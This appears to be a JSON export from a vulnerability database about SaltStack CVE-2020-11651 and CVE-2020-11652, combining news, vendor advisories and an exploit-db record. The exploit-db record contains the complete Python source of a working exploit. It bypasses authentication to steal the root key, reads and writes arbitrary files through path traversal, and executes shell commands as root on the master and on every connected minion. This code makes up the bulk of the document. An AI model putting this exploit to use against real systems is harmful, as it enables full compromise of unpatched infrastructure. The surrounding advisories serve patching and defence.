exploitability of the product depends on how the product has been deployed.\u201d A full list of the impact and recommended action for each deployment option, for each Cisco software release, [can be found on Cisco\u2019s alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>).\n\nTo be exploited, the salt-master service must be reachable on TCP ports 4505 and 4506, Cisco said. The company added that administrators can check their configured Cisco salt-master server by navigating to VIRL Server > Salt Configuration and Status.\n\n\u201cCisco continues to strongly recommend that customers upgrade to a fixed software release to remediate these vulnerabilities,\u201d Cisco said.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-28T20:51:25", "type": "threatpost", "title": "Hackers Compromise Cisco Servers Via SaltStack Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-05-28T20:51:25", "id": "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "href": "https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2022-11-02T11:54:21", "description": "3\\. vRealize Operations Application Remote Collector (ARC) addresses Authentication Bypass (CVE-2020-11651) and Directory Traversal (CVE-2020-11652) vulnerabilities. \n\nThe Application Remote Collector (ARC) introduced with vRealize Operations 7.5 utilizes Salt which is affected by CVE-2020-11651 and CVE-2020-11652. VMware has evaluated CVE-2020-11651 (Authentication Bypass) to be in the Critical severity range with a maximum CVSSv3 base score of 10.0 and CVE-2020-11652 (Directory Traversal) to be in the Important severity range with a maximum CVSSv3 base score of 7.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-08T00:00:00", "type": "vmware", "title": "vRealize Operations Application Remote Collector (ARC) addresses Authentication Bypass and Directory Traversal vulnerabilities (CVE-2020-11651, CVE-2020-11652)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-15T00:00:00", "id": "VMSA-2020-0009.1", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0009.1.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "photon": [{"lastseen": "2021-11-03T14:58:18", "description": "An update of {'salt3', 'iproute2'} packages of Photon OS has been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-15T00:00:00", "type": "photon", "title": "Home\nDownload Photon OS\nUser Documentation\nFAQ\nSecurity Advisories\nRelated Information\n\nLightwave - PHSA-2020-3.0-0091", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20795", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-15T00:00:00", "id": "PHSA-2020-3.0-0091", "href": "https://github.com/vmware/photon/wiki/Security-Updates-3.0-91", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T18:48:34", "description": "Updates of ['salt3', 'iproute2'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-15T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2020-0091", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20795", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-15T00:00:00", "id": "PHSA-2020-0091", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-91", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-03T17:48:58", "description": "An update of {'salt', 'salt3', 'ruby'} packages of Photon OS has been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-14T00:00:00", "type": "photon", "title": "Home\nDownload Photon OS\nUser Documentation\nFAQ\nSecurity Advisories\nRelated Information\n\nLightwave - PHSA-2020-1.0-0294", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10663", "CVE-2020-10933", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-14T00:00:00", "id": "PHSA-2020-1.0-0294", "href": "https://github.com/vmware/photon/wiki/Security-Updates-1.0-294", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "exploitdb", "title": "Saltstack 3000.1 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11651", "2020-11652", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "EDB-ID:48421", "href": "https://www.exploit-db.com/exploits/48421", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\r\n# Date: 2020-05-04\r\n# Exploit Author: Jasper Lievisse Adriaanse\r\n# Vendor Homepage: https://www.saltstack.com/\r\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\r\n# Tested on: Debian 10 with Salt 2019.2.0\r\n# CVE : CVE-2020-11651 and CVE-2020-11652\r\n# Discription: Saltstack authentication bypass/remote code execution\r\n#\r\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Exploit for CVE-2020-11651 and CVE-2020-11652\r\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\nfrom __future__ import absolute_import, print_function, unicode_literals\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport os.path\r\nimport sys\r\nimport time\r\n\r\nimport salt\r\nimport salt.version\r\nimport salt.transport.client\r\nimport salt.exceptions\r\n\r\ndef init_minion(master_ip, master_port):\r\n minion_config = {\r\n 'transport': 'zeromq',\r\n 'pki_dir': '/tmp',\r\n 'id': 'root',\r\n 'log_level': 'debug',\r\n 'master_ip': master_ip,\r\n 'master_port': master_port,\r\n 'auth_timeout': 5,\r\n 'auth_tries': 1,\r\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\r\n }\r\n\r\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\r\n\r\n# --- check funcs ----\r\n\r\ndef check_connection(master_ip, master_port, channel):\r\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\r\n sys.stdout.flush()\r\n\r\n # connection check\r\n try:\r\n channel.send({'cmd':'ping'}, timeout=2)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"OFFLINE\")\r\n sys.exit(1)\r\n else:\r\n print(\"ONLINE\")\r\n\r\ndef check_CVE_2020_11651(channel):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\r\n sys.stdout.flush()\r\n\r\n try:\r\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\r\n except:\r\n print('ERROR')\r\n return None\r\n else:\r\n pass\r\n finally:\r\n if rets:\r\n print('YES')\r\n root_key = rets[2]['root']\r\n return root_key\r\n\r\n print('NO')\r\n return None\r\n\r\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'cmd': 'get_token',\r\n 'arg': [],\r\n 'token': top_secret_file_path,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n print(\"NO\")\r\n \r\ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': top_secret_file_path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return']:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'data': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n\r\n pp(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'config.update_config',\r\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'yaml_contents': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652.conf')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef pwn_read_file(channel, root_key, path, master_ip):\r\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print(rets['data']['return'][0][path])\r\n\r\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\r\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\r\n sys.stdout.flush()\r\n\r\n try:\r\n fh = open(src, 'rb')\r\n payload = fh.read()\r\n fh.close()\r\n except Exception as e:\r\n print('[-] Failed to read {}: {}'.format(src, e))\r\n return\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'saltenv': 'base',\r\n 'data': payload,\r\n 'path': dest,\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print('[ ] {}'.format(rets['data']['return']))\r\n\r\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'runner',\r\n 'fun': 'salt.cmd',\r\n 'saltenv': 'base',\r\n 'user': 'sudo_user',\r\n 'kwarg': {\r\n 'fun': 'cmd.exec_code',\r\n 'lang': 'python',\r\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\r\n },\r\n 'jid': jid,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n\r\n if rets.get('jid'):\r\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\r\n\r\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': '_send_pub',\r\n 'fun': 'cmd.run',\r\n 'user': 'root',\r\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\r\n 'tgt': '*',\r\n 'tgt_type': 'glob',\r\n 'ret': '',\r\n 'jid': jid\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n finally:\r\n if rets == None:\r\n print('[+] Successfully submitted job to all minions.')\r\n else:\r\n print('[-] Failed to submit job')\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\r\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\r\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\r\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\r\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\r\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\r\n parser.add_argument('--read', '-r', dest='read_file')\r\n parser.add_argument('--upload-src', dest='upload_src')\r\n parser.add_argument('--upload-dest', dest='upload_dest')\r\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\r\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\r\n args = parser.parse_args()\r\n\r\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\r\n time.sleep(1)\r\n\r\n # Both src and destination are required for uploads\r\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\r\n print('[-] Must provide both --upload-src and --upload-dest')\r\n sys.exit(1)\r\n\r\n channel = init_minion(args.master_ip, args.master_port)\r\n\r\n check_connection(args.master_ip, args.master_port, channel)\r\n \r\n root_key = check_CVE_2020_11651(channel)\r\n if root_key:\r\n print('[*] root key obtained: {}'.format(root_key))\r\n else:\r\n print('[-] Failed to find root key...aborting')\r\n sys.exit(127)\r\n\r\n if args.run_checks:\r\n # Assuming this check runs on the master itself, create a file with \"secret\" content\r\n # and abuse CVE-2020-11652 to read it.\r\n top_secret_file_path = '/tmp/salt_cve_teta'\r\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\r\n fd.write(\"top secret\")\r\n\r\n # Again, this assumes we're running this check on the master itself\r\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\r\n root_key = keyfd.read()\r\n\r\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\r\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\r\n check_CVE_2020_11652_write1(debug, channel, root_key)\r\n check_CVE_2020_11652_write2(debug, channel, root_key)\r\n os.remove(top_secret_file_path)\r\n sys.exit(0)\r\n\r\n if args.read_file:\r\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\r\n\r\n if args.upload_src:\r\n if os.path.isabs(args.upload_dest):\r\n print('[-] Destination path must be relative; aborting')\r\n sys.exit(1)\r\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\r\n\r\n\r\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\r\n\r\n if args.exec:\r\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\r\n\r\n if args.exec_all:\r\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\r\n time.sleep(2)\r\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48421", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T15:34:51", "description": "## Releases\n\n * Ubuntu 18.04 LTS\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * salt \\- Infrastructure management built on a dynamic communication bus\n\nIt was discovered that Salt allows remote attackers to determine which files \nexist on the server. An attacker could use that to extract sensitive \ninformation. (CVE-2018-15750)\n\nIt was discovered that Salt has a vulnerability that allows an user to bypass \nauthentication. An attacker could use that to extract sensitive information, \nexecute abritrary code or crash the server. (CVE-2018-15751)\n\nIt was discovered that Salt is vulnerable to command injection. This allows \nan unauthenticated attacker with network access to the API endpoint to \nexecute arbitrary code on the salt-api host. (CVE-2019-17361)\n\nIt was discovered that Salt incorrectly validated method calls and \nsanitized paths. A remote attacker could possibly use this issue to access \nsome methods without authentication. (CVE-2020-11651, CVE-2020-11652)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T00:00:00", "type": "ubuntu", "title": "Salt vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-08-13T00:00:00", "id": "USN-4459-1", "href": "https://ubuntu.com/security/notices/USN-4459-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}